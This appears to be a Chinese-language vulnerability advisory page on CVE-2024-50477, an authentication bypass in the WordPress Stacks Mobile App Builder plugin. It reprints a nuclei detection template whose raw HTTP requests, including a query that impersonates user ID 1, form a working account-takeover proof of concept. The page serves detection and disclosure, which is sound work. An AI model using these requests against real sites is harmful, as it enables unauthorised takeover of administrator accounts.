WordPress Stacks Mobile App Builder Authentication Bypass Vulnerability

漏洞信息

漏洞名称: WordPress Stacks Mobile App Builder Authentication Bypass Vulnerability

漏洞编号:

  • CVE: CVE-2024-50477

漏洞类型: 权限绕过

漏洞等级: 严重

漏洞描述: WordPress的Stacks Mobile App Builder插件≤5.2.3版本存在一个认证绕过漏洞,该漏洞源于对查询参数的不当处理,允许攻击者冒充任意用户。这一漏洞的CVSS评分为9.8,属于严重级别。Stacks Mobile App Builder是一个WordPress插件,旨在帮助用户构建移动应用程序。它广泛应用于需要快速部署移动应用解决方案的网站中。漏洞的技术根源在于插件在处理某些查询参数时未能正确验证用户身份,导致攻击者可以通过构造特定的HTTP请求绕过认证机制。这种漏洞可能导致攻击者完全接管网站管理员账户,进而执行任意操作,如修改网站内容、安装恶意插件或窃取敏感数据。由于这是一个认证绕过漏洞,攻击者无需任何前置条件即可利用,且可以远程执行攻击,因此其潜在的安全风险极高。

产品厂商: stacks

产品名称: Stacks Mobile App Builder

影响版本: <=5.2.3

来源: https://github.com/projectdiscovery/nuclei-templates/blob/37a33e5e192bf213f1a1c55de1867713a2d9ac88/http%2Fcves%2F2024%2FCVE-2024-50477.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56

id: CVE-2024-50477

info:
name: WordPress Stacks Mobile App Builder <=5.2.3 - Authentication Bypass
author: stealthcopter,vijay-sutar
severity: critical
description: |
Stacks Mobile App Builder WordPress plugin ≤ 5.2.3 suffers from an authentication bypass vulnerability via improper handling of query parameters, allowing attackers to impersonate arbitrary users.
reference:
- https://github.com/stealthcopter/wordpress-hacking/blob/main/reports/stacks-mobile-app-builder-priv-esc/stacks-mobile-app-builder-priv-esc.md
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/stacks-mobile-app-builder/stacks-mobile-app-builder-523-authentication-bypass-via-account-takeover
- https://patchstack.com/database/vulnerability/stacks-mobile-app-builder/wordpress-stacks-mobile-app-builder-plugin-5-2-3-account-takeover-vulnerability?_s_id=cve
- https://github.com/20142995/nuclei-templates
- https://github.com/RandomRobbieBF/CVE-2024-50477
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-50477
cwe-id: CWE-288,CWE-306
epss-score: 0.34151
epss-percentile: 0.96759
cpe: cpe:2.3:a:stacksmarket:stacks_mobile_app_builder:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: stacks
product: stacks_mobile_app_builder
framework: wordpress
tags: cve,cve2024,wordpress,auth-bypass,account-takeover,wp-plugin,stacks

http:
- raw:
- |
GET /wp-content/plugins/stacks-mobile-app-builder/readme.txt HTTP/1.1
Host: {{Hostname}}

- |
GET /?mobile_co=1&uid=1 HTTP/1.1
Host: {{Hostname}}

- |
POST /wp-admin/index.php HTTP/1.1
Host: {{Hostname}}

redirects: true
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_1 == 200 && status_code_3 == 200'
- 'contains(body_1, "Stacks Mobile App Builder")'
- 'contains(body_3, "Dashboard") && contains(body_3, "Plugins")'
condition: and



WordPress Stacks Mobile App Builder Authentication Bypass Vulnerability
http://example.com/2025/07/24/github_797823065/
作者
lianccc
发布于
2025年7月24日
许可协议